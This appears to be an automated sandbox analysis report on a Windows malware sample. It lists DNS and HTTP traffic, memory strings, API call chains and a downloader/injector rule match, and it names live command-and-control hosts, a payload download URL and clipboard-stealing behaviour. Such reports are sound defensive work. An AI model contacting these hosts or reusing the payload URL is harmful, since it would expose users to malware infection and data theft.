                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0012D889 InternetReadFile,SetEvent,GetLastError,SetEvent,21_2_0012D889
                Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                Source: global trafficHTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: */*
                Source: global trafficDNS traffic detected: DNS query: httpbin.org
                Source: global trafficDNS traffic detected: DNS query: yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
                Source: global trafficDNS traffic detected: DNS query: home.fortth14ht.top
                Source: global trafficDNS traffic detected: DNS query: spuriotis.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:34:48 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:34:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://.css
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://.jpg
                Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                Source: Set-up.exe.0.drString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
                Source: Set-up.exe, Set-up.exe, 00000008.00000003.1524058618.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.1527089171.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.1526147549.0000000000AF9000.00000004.00000001.01000000.00000008.sdmp, Set-up.exe, 00000008.00000003.1524131578.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000003.1525266864.000000000130B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
                Source: Set-up.exe, 00000008.00000003.1525266864.000000000130B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1
                Source: Set-up.exe, 00000008.00000003.1525266864.000000000130B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
                Source: Set-up.exe, 00000008.00000002.1526147549.0000000000AF9000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://html4/loose.dtd
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000007.00000000.1286723336.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000007539000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.drString found in binary or memory: http://timestamp.digicert.com0
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000000.1364045625.0000000000185000.00000002.00000001.01000000.0000000B.sdmp, Fingers.18.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
                Source: Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
                Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://httpbin.org/ip
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://httpbin.org/ipbefore
                Source: Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: Climb.com, 00000015.00000002.2508980283.00000000038D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://razaseoexpertinbd.com/Assaac.exe
                Source: Climb.com, 00000015.00000002.2508980283.00000000038D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://razaseoexpertinbd.com/Assaac.exeb
                Source: Climb.com, 00000015.00000002.2508980283.00000000038D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://razaseoexpertinbd.com/Assaac.exeu9
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: Climb.com, 00000015.00000002.2509180090.00000000039A8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.2331210727.00000000039A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/
                Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/-
                Source: Climb.com, 00000015.00000002.2509180090.00000000039A8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.2331210727.00000000039A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/3
                Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/api
                Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click:443/api
                Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click:443/apiocal
                Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Fingers.18.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49754 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49778 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49784 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49790 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49801 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0012F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,21_2_0012F7C7
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_052E1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,21_2_052E1000
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0012F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,21_2_0012F55C
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,7_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00149FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,21_2_00149FD2

                System Summary

                barindex
                Source: 0.2.es5qBEFupj.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                Source: es5qBEFupj.exeStatic PE information: section name:
                Source: es5qBEFupj.exeStatic PE information: section name: .idata
                Source: es5qBEFupj.exeStatic PE information: section name:
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00124763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,21_2_00124763
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00111B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,21_2_00111B4D
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,7_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0011F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,21_2_0011F20D
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\UtilitySoccerJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\MoveRefurbishedJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\ClarkWriterJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_0040737E7_2_0040737E
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_00406EFE7_2_00406EFE
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_004079A27_2_004079A2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_004049A87_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_012FEFE48_3_012FEFE4
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7E88_3_0130F7E8
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7E88_3_0130F7E8
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7EB8_3_0130F7EB
